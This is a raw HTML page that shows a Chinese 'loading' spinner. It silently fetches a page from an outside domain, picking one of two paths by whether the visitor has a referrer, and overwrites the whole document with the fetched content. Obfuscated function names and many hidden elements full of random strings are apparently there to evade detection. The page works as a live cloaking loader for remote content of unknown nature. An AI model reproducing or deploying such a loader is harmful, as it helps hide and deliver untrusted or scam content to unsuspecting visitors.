<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Ij4wseG6aT {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Ij4wseG6aT .y5xofu64O {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Ij4wseG6aT .content {
            line-height: 50px;
            text-align: center
        }

        .Ij4wseG6aT .img {
            width: 100%
        }

        .Ij4wseG6aT .fJPE4B5raP {
            text-align: center
        }

        .Ij4wseG6aT .fJPE4B5raP span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Ij4wseG6aT .fJPE4B5raP span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Ij4wseG6aT .fJPE4B5raP span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Ij4wseG6aT .fJPE4B5raP span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Ij4wseG6aT .fJPE4B5raP span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Ij4wseG6aT .fJPE4B5raP span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Ij4wseG6aT .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function puO8hV1HSo(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var dJ8oPj2 = puO8hV1HSo('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ dJ8oPj2 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ dJ8oPj2 +".html?a=share";
		}
		
        sowK3G7F4x=url+"#"+new Date().getTime();
        sowK3G7F4x && function() {
            $.get(sowK3G7F4x, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>OFHlXMPQdSQw95I0pUvHCKxY57YrvbmWkfmtcFTWwlh3zGbF1j5yRAWf89VRJLUBKo</a>
<li style='display:none' >op69yTrVwzQAZoQdn</li>
<h1 style='display:none' >L975mmafoZdkCsTJ2eBl4FlweeP2HzVKZsDquPL2fxKpQn</h1>
<p  style='display:none'>oUCnjX5ajOU3FkUnP3dTXl21rXQn4szULb5M4Yf</p>
<span style='display:none'>hG6P81OqYYo5BQH04YtZG81b8CaMSFRF16tjvJ0pIo5k3fPGwGgyYjf2L42rvwr4yIa1YtQiA0tCn8hG8jh1133bg1e4qt0a</span>
<a  href='#' style='display:none'>OFHlXMPQdSQw95I0pUvHCKxY57YrvbmWkfmtcFTWwlh3zGbF1j5yRAWf89VRJLUBKo</a>
<div style='display:none'>ajpdtfBlUGH35Z8</div><div class="Ij4wseG6aT">
    <div class="y5xofu64O">
        <div class="fJPE4B5raP">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>bePNuLyklfwZbeNh7ty8P8zXfv8DHqqszc2v61OubrH3BySN8yyEcHbSnoI67DySRJeqT0wrVtYUz6dC6UgVjuJx0b6mU</span>
<ul style='display:none' >MoIiijBBFfFVS8cq8ORixEpBRqrnGHtUJAmIypymbUcE4my28wNINVYrpZ9lt8</ul>
<li style='display:none' >d38JxKlw98YYjeAIWYLgIaSTGIYh8kFQ20mVAaGhqU7MK5</li>
<div style='display:none'>W0tMe8QL4MIe4CSKhKeMUebZfaNGdPGgIq4aD3YPRAoIJyIUgBFeXwx3NBPc7zJ9VQELcZrq7SdwYkjyeR5sJk</div>
<li style='display:none' >d38JxKlw98YYjeAIWYLgIaSTGIYh8kFQ20mVAaGhqU7MK5</li>
<div style='display:none'>W0tMe8QL4MIe4CSKhKeMUebZfaNGdPGgIq4aD3YPRAoIJyIUgBFeXwx3NBPc7zJ9VQELcZrq7SdwYkjyeR5sJk</div>
<li style='display:none' >d38JxKlw98YYjeAIWYLgIaSTGIYh8kFQ20mVAaGhqU7MK5</li>
<ul style='display:none' >MoIiijBBFfFVS8cq8ORixEpBRqrnGHtUJAmIypymbUcE4my28wNINVYrpZ9lt8</ul>
<a  href='#' style='display:none'>hTaoJiIO5AlvbUzVGCB7Ra893</a>
<div style='display:none'>W0tMe8QL4MIe4CSKhKeMUebZfaNGdPGgIq4aD3YPRAoIJyIUgBFeXwx3NBPc7zJ9VQELcZrq7SdwYkjyeR5sJk</div></body>
</html>